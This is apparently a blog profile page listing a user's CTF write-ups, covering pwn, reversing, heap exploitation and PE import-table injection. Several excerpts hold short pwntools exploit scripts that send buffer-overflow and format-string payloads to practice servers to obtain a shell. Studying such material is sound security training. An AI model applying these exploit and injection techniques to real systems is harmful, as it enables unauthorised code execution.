3 playmak3r

尚未进行身份认证

patient

等级
TA的排名 13w+

进程创建期修改PE输入表法注入

进程创建期修改PE输入表法注入程序定义CImage类内部包含了一些有关PE结构的变量和一些函数函数列表如下findImagebase()AttachToProcess()InitializePEHeaders()AddNewSectionToMemory()LocateSectionByRVA()ALIGN_SIZE_UPALIGN_SIZE_UP(Size,Alignment...

2020-03-29 20:52:15

BUU刷题(三)

BUU刷题(三)fmfrom pwn import *context.log_level='debug'p=process('./fm')p=remote("node3.buuoj.cn","27782")payload=p32(0x0804a02c)+'%11$n'p.sendline(payload)p.interactive()others_shellcode拿到题目直...

2020-03-13 22:10:19

IAT结构分析

IAT结构分析IAT介绍解决兼容问题(不同机器的dll版本不同,地址自然不同),操作系统就必须提供一些措施来确保可以在其他版本的Windows操作系统,以及DLL版本下也能正常运行。这时IAT(Import Address Table:输入函数地址表)就应运而生了。IAT定位手工寻找利用PEview找到程序的NT头的可选头内有个import table此处记录了其RVA。根据结构体...

2020-03-13 22:08:44

office-栈溢出漏洞简单汇总

CVE-2017-1182关键词:rtf,公式编辑器,拷贝未检测长度,ACTIVEX控件解析漏洞原理:在读入公式的Font Name数据时,在将Name拷贝到一个函数内局部变量的时候没有对Name的长度做校验,从而造成栈缓冲区溢出漏洞函数:漏洞存在于EQNEDT21.EXE公式编辑器的sub_41160F函数中,我们将其拖进IDA,找到漏洞点,可以看到伪代码如下,这里没有对长度进行检验...

2020-02-07 19:07:30

BUU PWN (二)

BUU PWN (二)level0from pwn import *#p=process('./level0')p=remote("node3.buuoj.cn","26684")p.recvline()payload='a'*0x80+'a'*8+p64(0x400596)p.sendline(payload)p.interactive()ciscn_2019_n_5ret...

2020-02-07 15:29:49

BUU PWN(一)

test_your_nc连上即可拿到shellripfrom pwn import *context.log_level='debug'#p=process('./17pwn1')p=remote("node3.buuoj.cn","26137")p.recvuntil("please input\n")payload='a'*0xf+'a'*8+p64(0x401186)p.s...

2020-01-28 20:37:49

ichunqiu圣诞欢乐赛babyre

ichunqiu圣诞欢乐赛babyre程序关键函数在此此处是一些有关于多线程的函数,正好借此机会学习一下,顺便学习了一下多线程调试文章如下https://bbs.pediy.com/thread-254194.htm多线程CreateThread函数为创建线程,创建线程成功即运行这个线程。其中第三个参数为指向线程函数的指针第四个参数为向线程函数传递的参数WaitForSingle...

2020-01-06 15:12:46

internal chat圣诞欢乐赛

internal chat拿到题目开启的保护为很容易联想到覆写got表来getshell首先给注册一个用户,用户的结构体如下struct user{ char *user_name; __int64 age; char description[0x100]; _QWORD *addr; _QWORD *friend_addr; __in...

2020-01-05 15:56:59

frame faking

int __cdecl main(int argc, const char **argv, const char **envp){ char buf; // [rsp+0h] [rbp-40h] setbuf(stdin, 0LL); setbuf(_bss_start, 0LL); setbuf(stderr, 0LL); puts("Input Your Name:"...

2019-07-04 22:12:07

巅峰极客snote

巅峰极客snote链接:https://pan.baidu.com/s/1aAb4JjplV-MBj8iQCauI2Q提取码:977o复制这段内容后打开百度网盘手机App,操作更方便哦查看保护&大致逻辑是一个选单程序,且保护全开功能分析1.add2.showdword_202014为1,只能泄露一次3.deletedword_202010只能free一次,且...

2019-11-09 01:21:08

RC4变种算法分析

RC4算法分析及其变种链接:https://pan.baidu.com/s/1IBKy1mYugLxsoupbMGeXnA提取码:4b1b复制这段内容后打开百度网盘手机App,操作更方便哦题目Main流程大致如下 sub_402690(*(_QWORD *)&argc, argv, envp); v10 = 'i esaelP'; v11 = 'eht tupn'; ...

2019-09-30 01:09:18

CTF-wiki bin.exe 反调试练习

CTF-wiki bin.exe 反调试练习主函数大致逻辑如下:int __cdecl main(int argc, const char **argv, const char **envp){ FILE *v3; // eax HANDLE v4; // eax int v11; // [esp+C4h] [ebp-A8h] DWORD v12; // [esp+D4h] ...

2019-09-29 20:21:56

BUGKU 代码审计练习

BUGKU 代码审计练习extract变量覆盖<?php$flag=flag.txt;extract($_GET);//数组键名作为变量名,使用数组键值作为变量值if(isset($shiyan))//检测变量是否为空{ $content=trim(file_get_contents($flag)); if($shiyan==$content) { echo'flag{...

2019-08-30 16:16:20

HACKNOTE-UAF&system函数调用

HACKNOTE-UAF&system函数调用是一个32位选单程序主功能和开启的保护如下首先看add_note 部分unsigned int add_note(){ _DWORD *v0; // ebx signed int i; // [esp+Ch] [ebp-1Ch] int size; // [esp+10h] [ebp-18h] char buf; //...

2019-08-21 16:25:39

1000levels-vsyscall

1000levels-vsyscall题目是一个64位的程序 具体保护如下程序主要分为两部分,分别为go部分和hint部分。首先先看简单的hint部分int hint(){ signed __int64 v1; // [rsp+8h] [rbp-108h] int v2; // [rsp+10h] [rbp-100h] __int16 v3; // [rsp+14h] [r...

2019-08-11 02:50:59

babyfengshui-堆溢出

babyfengshui-堆溢出题目是一个32位的选单式程序,大致功能和保护如下逐一分析各个功能,首先是Add_user部分 printf("size of description: "); __isoc99_scanf("%u%c", &v2, &v0); sub_8048816(v2);_DWORD *__cdecl sub_80...

2019-07-31 21:48:40

RCTF babyre xxtea

xxtea程序是一个64位ELF程序发现里面包含了TEA相关的加密,调试程序可知输入的长度需要为16,且之后有3个关键的函数三个函数处理之后的结果与0x17异或之后,需要输出Bingo!第一个函数很简单是将我们输入的字符串变成HEX(测试字符1234567890123456)进入第二个函数,找到了第XXTEA的黄金比例(0x9e3779b9)首先排除TEA因为TEA加密没有拿黄...

2019-07-28 18:06:15

C++栈溢出

c++栈溢出程序开启的保护如下程序在注册的地方存在着栈溢出漏洞v20 = __readfsqword(0x28u); std::__cxx11::basic_string<char,std::char_traits<char>,std::allocator<char>>::basic_string(&v17); do { me...

2019-07-24 14:08:32

AES CBC 逆向分析,异常处理,反调试

AES CBC 逆向分析,异常处理,反调试AES CBC拿到题目在IDA中看见了类似AES的图标放入PEID的KANAL插件查看找到了AES的S盒和BASE64的S盒,初步确定了内部的加密算法为AES和base64。来到关键函数4020D0处此处对输入字符串进行了加密。进入该函数输入字符串首先和sctfsctfsctfsctf进行了异或之后又于sycloversyclover进...

2019-07-23 13:15:47

异常处理机制流程分析

异常处理机制拿到题目放入IDA中查看程序主逻辑 v7 = 0; memset(&v8, 0, 0x4Fu); v10 = dword_401360; sub_401060("input your flag : ", v6); v5 = (int **)80; sub_4010D0("%s", (unsigned int)&v7); v13 = &amp...

2019-06-30 00:57:51

查看更多

勋章 我的勋章
  • 持之以恒
    持之以恒
    授予每个自然月内发布4篇或4篇以上原创或翻译IT博文的用户。不积跬步无以至千里,不积小流无以成江海,程序人生的精彩需要坚持不懈地积累!
  • 勤写标兵Lv3
    勤写标兵Lv3
    授予每个自然周发布7篇到8篇原创IT博文的用户。本勋章将于次周周三上午根据用户上周的博文发布情况由系统自动颁发。
  • 学习力
    学习力
    《原力计划【第二季】》第一期主题勋章 ,第一期活动已经结束啦,小伙伴们可以去参加第二期打卡挑战活动获取更多勋章哦。